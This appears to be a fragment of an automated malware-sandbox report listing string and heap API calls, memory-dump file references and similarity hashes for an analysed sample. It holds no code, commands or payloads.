                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(026F8932,00000000,00000000,026F8932,616D692F,00000000), ref: 026F5FDD
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 026F5FE5
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 026F5FFC
                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 026F6007
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 74227042-0
                                                                                                                                                                                                                        • Opcode ID: dd537e4c315c2a0694d14f8eb459fe5f5cffe5f4177ca750d2dab6204fb58f02
                                                                                                                                                                                                                        • Instruction ID: 12f813c31d62041dbbf174a6b6f122c32b0817f912d8b8d8fb6b7b6dc720da7d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd537e4c315c2a0694d14f8eb459fe5f5cffe5f4177ca750d2dab6204fb58f02
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E01233805665ABCB52AFA4EC08C4FBBA9FF89250B054D16F75093110CB32C8259BE1
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%